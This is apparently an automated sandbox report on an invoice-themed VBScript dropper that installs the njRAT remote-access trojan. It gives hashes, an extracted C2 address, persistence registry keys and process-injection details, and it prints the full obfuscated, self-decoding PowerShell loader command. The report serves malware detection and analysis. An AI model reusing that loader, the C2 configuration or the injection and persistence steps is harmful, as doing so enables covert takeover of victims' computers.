Analysis
-
max time kernel
151s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
18-10-2021 20:05
Static task
static1
Behavioral task
behavioral1
Sample
Invoice #019972.vbs
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
Invoice #019972.vbs
Resource
win10-en-20210920
General
-
Target
Invoice #019972.vbs
-
Size
2KB
-
MD5
ee3daa79d7ac4570d146aceb38253293
-
SHA1
40b16db43a5c60e9f6a0ec49ab984698a3d1129b
-
SHA256
1e00836862dc8fc7fd742e9df49a8b0d141b391139bfb1c5a23f20413eb6d639
-
SHA512
6342d990ce3ea3ab94e2086cfda644d29bd5ea852da17f81b28b6d6a915ab0c31e9ea3580d302a43f277fdea68f1a8afe4be1c4343b89831b29f46b0bf1b70aa
Malware Config
Extracted
njrat
v2.0
CHEM
petrol-chem108.duckdns.org:40225
Windows
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 8 1768 powershell.exe 23 1768 powershell.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
aspnet_compiler.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" aspnet_compiler.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" aspnet_compiler.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" aspnet_compiler.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" aspnet_compiler.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1768 set thread context of 1856 1768 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1768 powershell.exe 1768 powershell.exe 1768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe Token: 33 1856 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1856 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2116 wrote to memory of 1768 2116 WScript.exe powershell.exe PID 2116 wrote to memory of 1768 2116 WScript.exe powershell.exe PID 1768 wrote to memory of 1856 1768 powershell.exe aspnet_compiler.exe PID 1768 wrote to memory of 1856 1768 powershell.exe aspnet_compiler.exe PID 1768 wrote to memory of 1856 1768 powershell.exe aspnet_compiler.exe PID 1768 wrote to memory of 1856 1768 powershell.exe aspnet_compiler.exe PID 1768 wrote to memory of 1856 1768 powershell.exe aspnet_compiler.exe PID 1768 wrote to memory of 1856 1768 powershell.exe aspnet_compiler.exe PID 1768 wrote to memory of 1856 1768 powershell.exe aspnet_compiler.exe PID 1768 wrote to memory of 1856 1768 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice #019972.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HB='!` ~+ ~A ~$ `` `+ `^ ~^ `& `! `$ `E `A ~+ `` `^ `& `$ !0 +D !0 !& ^$ &` &` &0 +A !F !F +1 ++ !E +^ += !E +1 +& +~ !E +1 +1 +~ !F ^! &= &0 ^1 &+ &+ !E &` &$ &` !& +B 0D 0A !` `~ `` ~! `^ `& `$ `E `A `D `B `` `~ `^ `& `$ `A !0 +D !0 !& ^E `~ !D !D !D !D !D !D !D !D !D !D !D !D !D !D !D !D `~ ^! `+ !B !B !B !B !B !B !B !B !B !B !B !B !B !B !B !B ~` !& !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& !D !D !D !D !D !D !D !D !D !D !D !D !D !D !D !D !& !C !& &` !E ~& !& != !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& !B !B !B !B !B !B !B !B !B !B !B !B !B !B !B !B !& !C !& ^C `= `~ `E !& != +B 0D 0A !` ~+ ~$ `` `+ `^ ~^ `& `! `$ `E `A ~$ `` `+ `^ ~^ `& `! `$ `A `B !0 +D !0 !& `` `F !A !A !A !A !A !A !A !A !A !A !A !A !A ^1 `` ~+ ~` +C +C +C +C +C +C +C +C +C +E +E +E +E +E +E +E +E +E +E +E `& !& !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& !A !A !A !A !A !A !A !A !A !A !A !A !A !& !C !& ~& ^E `C ^F !& != !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& +C +C +C +C +C +C +C +C +C +E +E +E +E +E +E +E +E +E +E +E !& !C !& &! `= ^E !& != +B 0D 0A !` ~+ ~& ~$ `` `~ `+ ~! `^ `& ~= `$ ~~ `A `= ~+ `` `^ ~^ `& `$ `A !0 +D !& `= ^0 `~ ~$ !$ ^E ^0 !D !D !D !D !D !D !D !D !D !D !D !D !D ^0 ^+ ^0 ~` !0 !` `~ `` ~! `^ `& `$ `E `A `D `B `` +C +C +C +C +C +C +C +C +C +C +C +C +C +C +E +E +E +E +E +E +E +E +E +E +E +E +E +E `& `! `$ `E `A ~+ `` `^ `& `$ != !& !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& !D !D !D !D !D !D !D !D !D !D !D !D !D !& !C !& ^~ ^0 ~& ^0 !D `F ^! ^A ^0 `~ !& != !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& +C +C +C +C +C +C +C +C +C +C +C +C +C +C +E +E +E +E +E +E +E +E +E +E +E +E +E +E !& !C !& `~ `^ `& `$ `A != !E !` ~+ ~$ `` `+ `^ ~^ `& `! `$ `E `A ~$ `` `+ `^ ~^ `& `! `$ `A `B !$ !` ~+ ~A ~$ `` `+ `^ ~^ !& != +B 0D 0A !^ !$ !& `= !& !B !& `~ ~$ !& != !$ !` ~+ ~& ~$ `` `~ `+ ~! `^ `& ~= `$ ~~ `A `= ~+ `` `^ ~^ `& `$ `A !0 !D `A ^F ^= ^E !0 !& !& != &C !^ !$ !& `= !& !B !& `~ ~$ !& != +B'.Replace('!','2').Replace('`','4').Replace('^','6').Replace('+','3').Replace('~','5').Replace('&','7').Replace('$','8').Replace('=','9');Invoke-Expression (-join ($HB -split ' ' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1768-131-0x000001A946BB0000-0x000001A946BB2000-memory.dmpFilesize
8KB
-
memory/1768-124-0x000001A946B90000-0x000001A946B92000-memory.dmpFilesize
8KB
-
memory/1768-117-0x000001A946B90000-0x000001A946B92000-memory.dmpFilesize
8KB
-
memory/1768-118-0x000001A946B90000-0x000001A946B92000-memory.dmpFilesize
8KB
-
memory/1768-119-0x000001A946B90000-0x000001A946B92000-memory.dmpFilesize
8KB
-
memory/1768-120-0x000001A946B90000-0x000001A946B92000-memory.dmpFilesize
8KB
-
memory/1768-121-0x000001A9628D0000-0x000001A9628D1000-memory.dmpFilesize
4KB
-
memory/1768-122-0x000001A946B90000-0x000001A946B92000-memory.dmpFilesize
8KB
-
memory/1768-123-0x000001A946B90000-0x000001A946B92000-memory.dmpFilesize
8KB
-
memory/1768-159-0x000001A946B90000-0x000001A946B92000-memory.dmpFilesize
8KB
-
memory/1768-125-0x000001A946B90000-0x000001A946B92000-memory.dmpFilesize
8KB
-
memory/1768-126-0x000001A962A80000-0x000001A962A81000-memory.dmpFilesize
4KB
-
memory/1768-127-0x000001A946B90000-0x000001A946B92000-memory.dmpFilesize
8KB
-
memory/1768-116-0x000001A946B90000-0x000001A946B92000-memory.dmpFilesize
8KB
-
memory/1768-156-0x000001A962A40000-0x000001A962A43000-memory.dmpFilesize
12KB
-
memory/1768-133-0x000001A946BB6000-0x000001A946BB8000-memory.dmpFilesize
8KB
-
memory/1768-144-0x000001A946BB8000-0x000001A946BB9000-memory.dmpFilesize
4KB
-
memory/1768-155-0x000001A946B90000-0x000001A946B92000-memory.dmpFilesize
8KB
-
memory/1768-115-0x0000000000000000-mapping.dmp
-
memory/1768-132-0x000001A946BB3000-0x000001A946BB5000-memory.dmpFilesize
8KB
-
memory/1856-165-0x0000000005960000-0x0000000005961000-memory.dmpFilesize
4KB
-
memory/1856-158-0x000000000040838E-mapping.dmp
-
memory/1856-162-0x0000000005300000-0x0000000005301000-memory.dmpFilesize
4KB
-
memory/1856-163-0x0000000005D80000-0x0000000005D81000-memory.dmpFilesize
4KB
-
memory/1856-164-0x0000000005470000-0x0000000005471000-memory.dmpFilesize
4KB
-
memory/1856-157-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1856-166-0x0000000005910000-0x0000000005911000-memory.dmpFilesize
4KB
-
memory/1856-167-0x0000000005B60000-0x0000000005B61000-memory.dmpFilesize
4KB